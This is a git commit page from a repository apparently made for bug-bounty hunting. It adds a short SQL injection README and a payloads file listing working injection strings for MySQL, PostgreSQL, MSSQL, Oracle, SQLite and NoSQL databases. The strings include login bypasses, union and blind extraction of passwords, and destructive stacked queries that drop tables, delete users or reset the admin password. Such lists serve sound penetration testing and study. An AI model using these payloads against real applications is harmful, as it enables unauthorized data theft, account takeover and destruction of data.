0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Restructure repository: Remove OWASP categorization, organize by vulnerability type

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-04 19:01:04 +00:00
parent 274734e91a
commit ba72efbc5e
46 changed files with 341 additions and 323 deletions
Download Patch File Download Diff File Expand all files Collapse all files
SQL-Injection/README.md
+17
View File
@@ -0,0 +1,17 @@
# SQL Injection
## Description
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view, modify, or delete data that they are not normally able to retrieve.
## Common Attack Vectors
- Login forms
- Search fields
- URL parameters
- HTTP headers
- Cookie values
## Testing Approach
Submit malicious SQL syntax in input fields and observe application behavior, error messages, and response times to identify SQL injection vulnerabilities.
## Payloads
See `sql-injection-payloads.txt` for a comprehensive list of SQL injection payloads.
SQL-Injection/sql-injection-payloads.txt
+86
View File
@@ -0,0 +1,86 @@
# SQL Injection Payloads
# Basic SQL injection
'
''
' OR '1'='1
' OR 1=1--
' OR 'a'='a
" OR "1"="1
" OR 1=1--
admin' --
admin' #
admin'/*
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
# Union-based SQL injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION ALL SELECT 1,2,3--
# Error-based SQL injection
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--
' AND EXTRACTVALUE(1,CONCAT(0x5c,@@version))--
' AND 1=UPDATEXML(1,CONCAT(0x5e24,(SELECT @@version),0x5e24),1)--
# Boolean-based blind SQL injection
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(@@version,1,1)='5'--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--
# Time-based blind SQL injection
'; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
'; SELECT pg_sleep(5)--
' AND SLEEP(5)--
' AND 1=BENCHMARK(5000000,MD5('test'))--
# Stacked queries
'; DROP TABLE users--
'; DELETE FROM users WHERE 1=1--
'; INSERT INTO users VALUES ('hacker','pass')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
# Comment injection
--
-- -
#
/**/
/*!50000*/
# Database-specific payloads
# MySQL
' AND 'x'='x
' AND SLEEP(5) AND 'x'='x
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
# PostgreSQL
' AND 'x'='x
'; SELECT pg_sleep(5)--
# MSSQL
' AND 'x'='x
'; WAITFOR DELAY '00:00:05'--
# Oracle
' AND 'x'='x
' AND 1=dbms_pipe.receive_message('a',5)--
# SQLite
' AND 'x'='x
' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5/2))))--
# NoSQL injection
{"$gt": ""}
{"$ne": null}
{"$where": "sleep(5000)"}
' || '1'=='1
admin' || 'a'=='a